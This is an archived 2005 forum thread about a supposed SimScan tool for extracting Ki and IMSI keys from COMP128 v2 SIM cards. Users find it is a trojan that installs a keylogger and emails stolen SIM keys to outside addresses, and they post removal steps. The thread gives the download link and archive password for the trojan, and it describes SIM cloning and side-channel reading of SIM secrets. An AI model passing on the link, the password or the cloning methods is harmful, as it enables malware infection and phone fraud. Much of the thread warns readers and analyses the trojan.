PDA

View Full Version : Comp128 v2


RuSeK3000
01-17-2005, 17:03
Sorry, I speak polish.

Witam!
Poniżej zamieściłem program SimScan do nowych simek zabezpieczonych algorytmem Comp128 v2.
Niejestem pewien czy ten program działa, gdyż mi nieudało się wyciągnąc kadu ki za jego pomoca z nowych simek. :confused: :(
Wiec prosze was o przetestowanie tego programu i podzielenie się zemna swoimi wynikami.
Moze problem lerzy w czytniku, ja posiadam Phoenixa z kwarcem 6MHz, a z tego co mozna zauwazyc w programie to chyba trzeba uzyc kwarcu 42.85MHz, którego nigdzie nie moge dostac. Mozliwe jest ze trzeba uzyc innego interface niz Phoenix, bo w programie jest jakas opcja "ESR Reader".
Program ten jest wykrywany przez antywiry jako wirus trojan beckdor, wiec uwaznie go testujcie, gdyz to moze byc zwykla sciema, albo i nie z tym comp128 v2, a gdy juz z n iej wyciagnie KI i IMSI to wysle go gdzies w swiat, i ktos bedzie dzwonil z klona naszek karty. Wiec skanujac karte lepiej odlaczyc się od internetu.

Jesli cos odkryjecie to prosze o niezwloczny kontakt ze mna pod RuSeK3000@poczta.fm
Jesli macie pytania odnosnie spakowanego pliku to prosze rowniez o kontakt RuSeK3000@poczta.fm Postaram się szybko odpisac.
Wiec pozdrawiam i czekam na maile.

www.linux4you.republika.pl/sim_scanv3.rar

DKNY2002
01-19-2005, 17:15
mi m8
i don't understand you but the file is protect with password so i cannot unzip it

Skiller_1
01-19-2005, 17:21
Hi friend this file contain virus!!!! don't unzip this. I have passworde for this file, but this is joke this is not new version of simscan.

DKNY2002
01-19-2005, 17:30
just give me tha password m8 i'll try it on my risk

colin breave
01-20-2005, 10:20
for a Dona Karan ny

pasw:123123123

colin breave
01-20-2005, 10:49
After wide issue of crypto steady SIM, cloning as business gradually died out. But Russian specialists could duplicate and they had started up to life this new technology of reading of SIM with Comp 2. Thus, European and American engineers, numerous froad-managers, and other specialists somehow overlook simple fact: above all, SIM-card is an electrical microchip, which needs some electrical energy for its work. Moreover such energy consumption changes depend on working of specific areas of chips SIM card. At first time, we were interested in the area of SIM, which responsible for Key Identification (KI). Yes, these electric changes are very little, imperceptible, they could be measured in parts of microamperes, but tracing is nevertheless possible. Furthermore, it is possible to trace the small electromagnetic waves (radiation) from microchip, because any electrical device radiates waves ? more or small. The clock frequency of processor of SIM cannot be stable on various modes of work. In case with SIM, some changes have observed on 10-20 KHz during accepting of some pair of KI. Using this method, we were succeed in access to ?the holy of holies? of SIM: PIN1,PIN2, PUK1, PUK2. The first model of the device for reading SIM v2 was assembled enough complex, large, bulky, it was seemed like a vacuum tube radio receiver. Some time later, we have done a big lot of work in this sphere.

afakanm
01-20-2005, 18:05
Sorry, I speak polish.

Witam!
Poniżej zamieściłem program SimScan do nowych simek zabezpieczonych algorytmem Comp128 v2.
Niejestem pewien czy ten program działa, gdyż mi nieudało się wyciągnąc kadu ki za jego pomoca z nowych simek. :confused: :(
Wiec prosze was o przetestowanie tego programu i podzielenie się zemna swoimi wynikami.
Moze problem lerzy w czytniku, ja posiadam Phoenixa z kwarcem 6MHz, a z tego co mozna zauwazyc w programie to chyba trzeba uzyc kwarcu 42.85MHz, którego nigdzie nie moge dostac. Mozliwe jest ze trzeba uzyc innego interface niz Phoenix, bo w programie jest jakas opcja "ESR Reader".
Program ten jest wykrywany przez antywiry jako wirus trojan beckdor, wiec uwaznie go testujcie, gdyz to moze byc zwykla sciema, albo i nie z tym comp128 v2, a gdy juz z n iej wyciagnie KI i IMSI to wysle go gdzies w swiat, i ktos bedzie dzwonil z klona naszek karty. Wiec skanujac karte lepiej odlaczyc się od internetu.

Jesli cos odkryjecie to prosze o niezwloczny kontakt ze mna pod RuSeK3000@poczta.fm
Jesli macie pytania odnosnie spakowanego pliku to prosze rowniez o kontakt RuSeK3000@poczta.fm Postaram się szybko odpisac.
Wiec pozdrawiam i czekam na maile.

www.linux4you.republika.pl/sim_scanv3.rar


FORMERLY MORE FORMERLY THERE THIS PROGRAMME
ISN'T WORKING ,THERE ARE OTHER METHOD
comp 128v2 not reader

SirGraham
01-21-2005, 08:52
Hi,

This program DONīT EXTRACT the ki in COMP128 v2.

Also...this version of SIMSCAN have a troyan horse and send (by winsock) the IMSI & Ki for internet (only in the case of this card is COMP128 v1).

@POSTMASTER or MODERATOR:
please BE CAREFULL WITH this kind of messages. A lot of people can be more problems with hoax and tricks like this....

Regards,
Sir Graham.

RuSeK3000
01-21-2005, 11:03
I greet!
Programme this what I put she did not happen unfortunately.
In order to to read new cards one should uses esr reader.
You know maybe where it it was been possible to find schem ESR READER?
Best regards

RuSeK3000
01-21-2005, 11:10
Here it is side (http://www.esr.nightmail.ru/4_eng_readkiimsi.htm) on which is described reading of new cards.
Someone schem has maybe?

RuSeK3000
01-21-2005, 11:11
and this page http://www.esr.nightmail.ru/3_eng_read_comp2.htm

SirGraham
01-21-2005, 11:16
Hi,

The ESR reader is a simple Phoenix reader. They (the creator of this HOAX) sell this reader ... Its a simple phoenix "camouflaged".

The creators of this put a SIMSCAN of dejan in a "shell" and controls the program, when the SIMSCAN found the Ki and IMSI the "shell" program send this info by internet.
If you buy the ESR reader you have doble deceit:

1š you pay more for a normal phoenix. (of course You canīt extract the ki of COMP128 v2). More: the SIMSCAN of Dejan ONLY WORKs with a normal phoenix for this razon the ESR canīt be a "special" reader.

2š Your confidencial info can be send by internet (IMSI & Ki) (only if you uses the program with a SIM with COMP128 v1. It canīt extract the Ki of COMP128 v2)


PLEASE DONīT SEND MORE THIS KIND OF INFO. THIS IS A HOAX and BIG DECEIT....

Regards,
Sir Graham.

afakanm
01-21-2005, 15:50
worn scan 1,8
every thing same.comp 128v2 nor reader imsi&ki
????????????????????????????????

VendorGSM
01-21-2005, 17:57
WARNING !!!!!!!

The file is infected with a dangerous TROJAN named LYDRA SPY. This allow others access your computer, record keystrokes typed and more. After you run the file trojan is autoinstalled in registry and in your PC in STEALTH mode (can't be finded).

MODERATORS be careful because this kind of trojans can stolen your acces at FORUM control panel and at all your emails !!!

Sethxp
01-24-2005, 10:27
Sure, lsass32.exe and internat.exe added to c/windows and also added to registry, startup (it think its hidden, hehe) and trying connect to internet (trough Outpost firewall, hehe)

and when you try delete lsass32.exe it make new file lsass32del.exe, funny trojan :D
Seth

Woron
01-26-2005, 14:05
They took my program, changed text labels and combined with troyan ..
So strongly recomended do not download and use it...

I'd like to remind that trusted software can be downloaded only from original sites..

Sethxp
01-26-2005, 14:53
Yeah, and i also ad original Woron scan to my download page.

http://seth.kvalitne.cz/downx.html

Regards

Seth

RuSeK3000
01-26-2005, 19:00
1. Go to %SytemRoot% and del.
2. Go to "regedit" and del. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\\internat.

Sethxp
01-27-2005, 10:10
1. Go to %SytemRoot% and del.
2. Go to "regedit" and del. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\\internat.

dont need it, all this "funny" soft Iam testing on "virtual emulated machine" hehe

for other users DONT USE THIS SW

gsmdreams
01-27-2005, 10:36
No known reader can extract ki in V2 please dont confuse other guys please....

SirGraham is there any hope in the future to read exract these Ki in these cards. I here there is also V3

.teddybear
01-27-2005, 22:58
Hi :)

What a pitty, that a 'new' Woron 1.08 just ussles and dangerous joke ... and it contained a troyan. I thought that will crack my V2 but I was wrong ...

Anyone know how to delete this troyan, 'cos that method witch give RuSeK3000 dosen't work propertly ....

Now my Outpost Firewall blocking that troyan but I have to delete it, and I don't know how .... :(

zetagabri
01-28-2005, 08:41
OHH What a miracle!!!! RuSek3000 suddenly speak english!!!!

Sethxp
01-28-2005, 09:57
Hi :)

What a pitty, that a 'new' Woron 1.08 just ussles and dangerous joke ... and it contained a troyan. I thought that will crack my V2 but I was wrong ...

Anyone know how to delete this troyan, 'cos that method witch give RuSeK3000 dosen't work propertly ....

Now my Outpost Firewall blocking that troyan but I have to delete it, and I don't know how .... :(

Simply download new antispyware software directly from microsoft, it will remove all keylogger entries from registry and after that also delete lsass32.exe & internat.exe from x:\windows

or use spybot free antispyware software (much better that microsoft one)

Regards
Seth

Quetzal
01-28-2005, 20:34
This trojan try to send email to :
47178@mail.ru <47178@mail.ru>
nfd984@rambler.ru <nfd984@rambler.ru>